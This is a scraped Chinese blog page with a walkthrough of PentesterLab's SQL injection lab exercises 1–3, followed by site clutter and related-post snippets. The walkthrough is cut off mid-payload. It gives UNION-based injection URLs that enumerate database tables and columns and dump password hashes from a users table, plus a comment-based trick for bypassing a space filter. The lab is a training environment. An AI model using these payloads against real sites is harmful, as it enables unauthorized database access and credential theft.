pentesterlab-sql

最新推荐文章于 2023-02-06 20:06:21 发布
最新推荐文章于 2023-02-06 20:06:21 发布
阅读量312 收藏 1
点赞数 2
分类专栏: 靶机笔记 文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44881113/article/details/121109199
版权

第一关
http://192.168.1.142/sqli/example1.php?name=root
有可见传递参数,测试是否存在注入
http://192.168.1.142/sqli/example1.php?name=root’ 报错即存在注入
pyaload

http://192.168.1.142/sqli/example1.php?name=root' order by 1 %23
http://192.168.1.142/sqli/example1.php?name=root%27union%20select%20group_concat(table_name),2,3,4,5%20from%20information_schema.tables%20where%20table_schema=%27exercises%27--+
http://192.168.1.142/sqli/example1.php?name=root%27union%20select%20%20group_concat(column_name),2,3,4,5%20from%20information_schema.columns%20where%20table_name=%27users%27--+
http://192.168.1.142/sqli/example1.php?name=root%27union%20select%20group_concat(passwd)%20,2,3,4,5%20from%20users%20--+

第二关
提示 ERROR NO SPACE
拦截了空格 使用/**/代替空格绕过

http://192.168.1.142/sqli/example2.php?name=root%27union/**/select/**/group_concat(passwd),2,3,4,5/**/from/**/users%23

第三关
感觉第二关一样

http://192.168.1.142/sqli/example3.php?name=root%27order/**/by/**/5%23
http://192.168.1.142/sqli/example3.php?name=root%27union/**/select/**/1,2,3,4,5%23
http://192.168.1.142/sqli/example3.php?name=root%27union/**/select/**/null,2,3,4,5%23
http://192.168.1.142/sqli/example3.php?name=root%27union/**/select/**/database(),2,3,4,5%23
http://192.168.1.142/sqli/example3.php?name=root%27union/**/select/**/group_concat(table_name),2,3,4,5/**/from/**/information_schema.tables/**/where/**/table_schema="exercises"%23
http://192.168.1.142/sqli/example3.php?name=root%27union/**/select/**/group_concat(column_name),2,3,4,5/**/from/**/information_schema.columns/**/where/**/table_name=
最低0.47元/天 解锁文章
金色的天空
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通过Pentester_Lab学习XML注入
Mi1k7ea
05-14 1510
Pentester Lab是一款老外编写的Web渗透练习环境。   XML注入相关概念: XML是一种可扩展标记语言,可以理解为HTML的扩展语言,一般用于数据存储、数据传输、数据共享,其中DTD文档来解释XML文档。XML必须包含根元素,所有的标签都要闭合,对大小写敏感,并且属性值需要加引号。 XML注入即XXE(XML外部实体注入),是指利用可控的参数或入口来加载不可控的参数或代码,造...
PentesterLab-From SQL Injection to Shell
weixin_30530339的博客
09-14 197
一、打开靶机ip出现如下界面: 随便点一下,点到test链接,访问了如下url:http://192.168.109.131/cat.php?id=1,这出现了一个id,常规思路这个位置可能有sql注入。然后看其他链接,都差不多,直到点到Admin的链接时,出来一个后台。 二、SQL注入先行 既然有id=1,首先看下这个id是字符还是数字,后面加一个 ' 号,出现了Mysql的报...
Pentester Lab SQL to shell
hl1293348082的专栏
04-11 305
PentesterLab提供了可用于测试和了解漏洞的易受攻击的系统。 官方地址:https://pentesterlab.com/ 渗透环境 Kali 192.168.22.128 靶机 我们去发现。(在同一内网) 正文开始 首先先介绍一款工具,个人觉得老牛逼——Netdiscover,之前我询问一哥们arp扫描工具时他推荐的。 工具可以在网络上扫描IP地址,检查在线主机或搜索为它们发送的ARP请求, root@kali:~# netdiscover //直接回车不带任何 自动快速发现
PentesterLab-From SQL Injection to Shell: PostgreSQL edition
weixin_30731305的博客
09-18 198
一、打开页面,随便点了几下,返现和From SQL Injection to Shell差不多,直奔主题开始注入   由于PostgreSQL与MySQL不同,几个关注点需要注意下 二、order by下看看有几个字段 /cat.php?id=1%20order%20by%204 #order by 4正常,5出现报错,说明有4个字段 三、查看注入点在什么位置,...
PentesterLab靶场sql注入流程
m0_37570494的博客
01-28 3813
环境安装 随便在网上找了个Pentester的靶场,结果是2013年的,那就从2013年的这个靶场开始学习 下载镜像的地址: https://pentesterlab.com/exercises/web_for_pentester_II/iso 正常找个虚拟机,进行iso的安装 安装完成后,查下虚拟机的IP,直接访问即可http://192.168.29.129/ sql注入 Example 1 万能密码: 自己尝试了几个密码,筛选出了这几个通关的,亲试可用: admin'or 1=
wjz-sqlFormat
08-23
格式化后接近PLSQL格式化效果。
wjz-sqlFormat-1.4
02-22
DBeaver工具很强大,但在sql格式化方面不尽人意,所以利用它的扩展功能开发出来的一个功能。说明文档: https://blog.csdn.net/wangjz2008/article/details/114082969 1、首选项中找到:sql编辑器->sql格式化 ,【格式...
sql server 2012 T-SQl基础教程 源码和示例数据库
04-01
SQL Server 2012 T-SQL基础教程——源码与示例数据库》 本教程专注于Microsoft SQL Server 2012中的Transact-SQL(T-SQL)语言,这是SQL Server的主要查询语言,用于数据操作、查询、存储过程和数据库对象的编程...
jupyterlab-sql:JupyterLabSQL GUI
01-30
jupyterlab-sql jupyterlab-sql向JupyterLab添加了一个SQL用户界面: 通过点击界面浏览表 使用自定义查询读取和修改数据库 安装 在JupyterLab 1.x上安装 要安装jupyterlab-sql ,请运行以下命令: pip install ...
xeus-sql:xeus-sql是用于一般SQL实现的Jupyter内核
05-15
xeus-sql xeus-sql是Jupyter内核,用于基于Jupyter协议和 (用于C ++的数据库访问库)的本机实现的常规SQL实现。用法启动Jupyter笔记本jupyter notebook或Jupyter实验室与jupyter lab ,并通过选择XSQL内核推出一个...
web_for_pentester镜像文件
08-05
网络安全渗透测试环境镜像文件,直接装在虚拟机上可运行
[Pentester Lab]From SQL Injection to Shell
CD的博客
04-07 649
本文翻译了[Pentester Lab]From SQL Injection to Shell的要点,记录了笔者按照教程进行复现的过程。 By the way,庆祝一下自己拿到的第一个Web Shell(虽然是靶机233333 1. 介绍 实验目的: 在基于PHP的网站中使用SQL注入,以及攻击者如何使用SQL注入获取管理员界面的访问权限。然后,攻击者可以在Server上实现代码执行...
Pentester Lab闯关记录2(SQL Injections)
weixin_43408042的博客
10-14 477
Pentester Lab闯关记录2(SQL Injections)example1验证漏洞是否存在猜测查询返回的列数收集数据库基本信息爆破数据库 example1 验证漏洞是否存在 首先构造下面payload测试是否存在sql注入漏洞: http://192.168.202.131/sqli/example1.php?name=root’ and 1=1 --+ payload为:’ and 1=1 --+ 首先使用'闭合sql语句中的’,然后注入payload,使用--+注释掉后面的内容 发现正常返
[Pentester Lab]from_sql_to_shell靶机
Re1_zf的博客
10-11 743
由此得到的这个账号密码可能就是上面那个登录页面的账号密码,而且这sqlmap也直接给解密了密码的md5值。这个表是一个图片表,名称是一个herf,可以直接查看,后面的delete应该也是可以删除这张图片。测试一下注入点,页面的内容发生了改变,并且改编成的页面内容跟预期是一样的。首先找到一个传参的页面,记好测试前的页面的状态,然后开始测试。上传成功,检测机制不会涉及到内容,可能只是单纯的文件后缀检测。页面有些简单,但是众所周知,越简单的页面越恐怖,继续往下看。想办法上传一个可以以php格式解析的文件。
靶机12 PENTESTER LAB: XSS AND MYSQL FILE
honest_gg的博客
10-09 1786
本靶机练习说明如何使用跨站点脚本漏洞来访问管理员的 Cookie。然后,如何使用他/她的会话来访问管理以查找SQL注入并使用它获得代码执行。
Web_for_Pentester_I之SQL注入
最新发布
贝隆的博客
02-06 510
Web_for_Pentester_I之SQL注入
PentesterLab » Web for Pentester 通关笔记
weixin_44377940的博客
02-08 996
寒假看到一个练习题,很有意思也很适合我这样的新手,于是下载下来练手。 下载地址
pentesterlab学习记录-week1
繁华褪尽始见真
03-30 868
Pentesterlab是一个引导你自学Web渗透测试技术的网站。它提供了一个为期15周的训练课程,以及不少供渗透测试的虚拟系统。 作为刚接触Web渗透的新人,我打算在博客记录训练课程的学习过程(主要是操作部分),今天是第一周。 Week 1: Linux and scripting 在虚拟机安装Linux系统 学习一门脚
PentesterLab渗透演练平台
weixin_33695450的博客
04-02 975
转载自: https://www.blackh4t.org/archives/1143.html http://www.91ri.org/5958.html web for pentester是国外安全研究者开发的的一款web渗透测试平台(环境) 通过该平台你可以了解到常见的Web漏洞检测技术。 1、什么是WebAp...
T-SQL编程入门指南
"T-SQL编程教程,适合初学者学习,涵盖了变量定义、数据输出、逻辑控制语句以及批处理的概念。" 在SQL Server中,T-SQL(Transact-SQL)是扩展了标准SQL的编程语言,用于管理和操作数据库。本资源主要关注以下几个T...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值